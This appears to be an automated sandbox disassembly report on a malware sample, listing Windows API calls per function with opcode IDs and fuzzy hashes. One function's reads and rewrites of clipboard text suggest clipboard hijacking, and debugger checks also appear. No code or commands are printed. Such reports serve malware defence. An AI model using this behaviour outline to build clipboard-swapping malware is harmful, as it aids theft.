                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                • Instruction ID: f17124ca1f65e1d54ebfe5fa41bf074b606f732df4eab291305720e801c9efe4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3113C79A40208EFDB01DF98C989E98BFF5AF08751F0580A4F9489B362D375EA50DF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0214194D
                                                                                                                                                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 02141957
                                                                                                                                                                                                                                  • Part of subcall function 0214CE6D: _strlen.LIBCMT ref: 0214CE84
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 02141984
                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 02141994
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 021419B0
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 021419DF
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02141B23
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 02141B39
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02141B46
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02141B70
                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 02141B79
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 02141B80
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 02141BA4
                                                                                                                                                                                                                                • Sleep.KERNEL32(000002D2), ref: 02141BAF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                • String ID: 4#E$i
                                                                                                                                                                                                                                • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                                                                                                                                                • Instruction ID: 395fabcb3ba6bd93a63d1c0aca1a7da68517c0c533691957d7e675dc87d2a06c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951F131C40784AEE3219BA8EC457BD7B74FF2A306F045225D809A6162EF709AC5CB69
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02142392
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 021423A7
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 021423AE
                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 021423C1
                                                                                                                                                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021423E0
                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02142401
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0214240C
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 02142415
                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02142439
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 021424C4
                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 021424DC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1529870607-0
                                                                                                                                                                                                                                • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                                • Instruction ID: 0938e38a56834650c8d007b4c6b85fe457b8bd8fe7e9d8bf0828c0c897968705
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9571DB72900218AFDB22DF68DD85FAEBBBCEF09751F0041A5B609E6155DA70AF80CF54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0217BCE4,?,00000000), ref: 0217BA5E
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0217BCE4,?,00000000), ref: 0217BA87
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,0217BCE4,?,00000000), ref: 0217BA9C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                • Instruction ID: 2acb0a43152a6025f77e466f44de915647ea3de5805afab3a67ad6cd24d1600e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F215036688105AADB34AF59D901BA773B6EBC4F6CB578464E90AE7110FB32DF40C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172190
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0217219D
                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0217BCA5
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0217BD00
                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0217BD0F
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,02170A0C,00000040,?,02170B2C,00000055,00000000,?,?,00000055,00000000), ref: 0217BD57
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,02170A8C,00000040), ref: 0217BD76
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2287132625-0
                                                                                                                                                                                                                                • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                • Instruction ID: e3d212c09233d548d66c5008fab0646a16869261bab70184ffe9562db592eeb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91518071944209AFEB10DFA5CC44ABF77B9FF84708F058469E910E7150EB719B41CBA1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2287132625-0
                                                                                                                                                                                                                                • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02170A13,?,?,?,?,0217046A,?,00000004), ref: 0217B343
                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0217B3D3
                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0217B3E1
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02170A13,00000000,02170B33), ref: 0217B484
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2444527052-0
                                                                                                                                                                                                                                • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                • Instruction ID: 4554be8ea4ef74dd093eb5ba1e15b69503ae9e5cd9ac0029a641a8743417d7ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F610C72A84205AED724AF74CC41BBB73BDEF95718F144039E916D7180E774DA41CBA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2444527052-0
                                                                                                                                                                                                                                • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                                • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2834031935-0
                                                                                                                                                                                                                                • Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                                • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0214DACD), ref: 0216A722
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0214DACD), ref: 0216A72C
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0214DACD), ref: 0216A739
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                • Instruction ID: 8631a82333e510e4123275843bfab7841c6255be116081f8ceafab8ac59169c2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F31D47494122CABCB21DF64DD8879CBBB8BF08710F5042EAE81CA7250EB359B958F45
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                                • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,0217008C,00000000,00457970,0000000C,021701E3,00000000,00000002,00000000), ref: 021700D7
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0217008C,00000000,00457970,0000000C,021701E3,00000000,00000002,00000000), ref: 021700DE
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 021700F0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                • Instruction ID: 115b5437a5d7d180ea2bd120db2a78df98e9753ff5597d6f2bc9eae52a43cfee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49E0B635040248AFCF11AF64DD08A597B7AFB89B96F404024FA059B121CB76DE42CA84
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0042FE89
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                • API String ID: 0-2784972518
                                                                                                                                                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                • Instruction ID: 73dd17916704013b6aa2fadb5f32d60aef856f906f372de50ee15ae35a68fbe6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F316CB6910609DFDB14CF99C880AAEBBF5FF48324F15404AD549A7310D771EA45CFA4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                                                • API String ID: 0-2043925204
                                                                                                                                                                                                                                • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                • Instruction ID: 1026ffc7026e7fcd90c4322e1e1c86363c44cc3d6e6e10b8242395970588924f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3410372940218AECB249FB9DC4CEEB77B9EBC0714F2142A9E915D7180E7319E81DB60
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
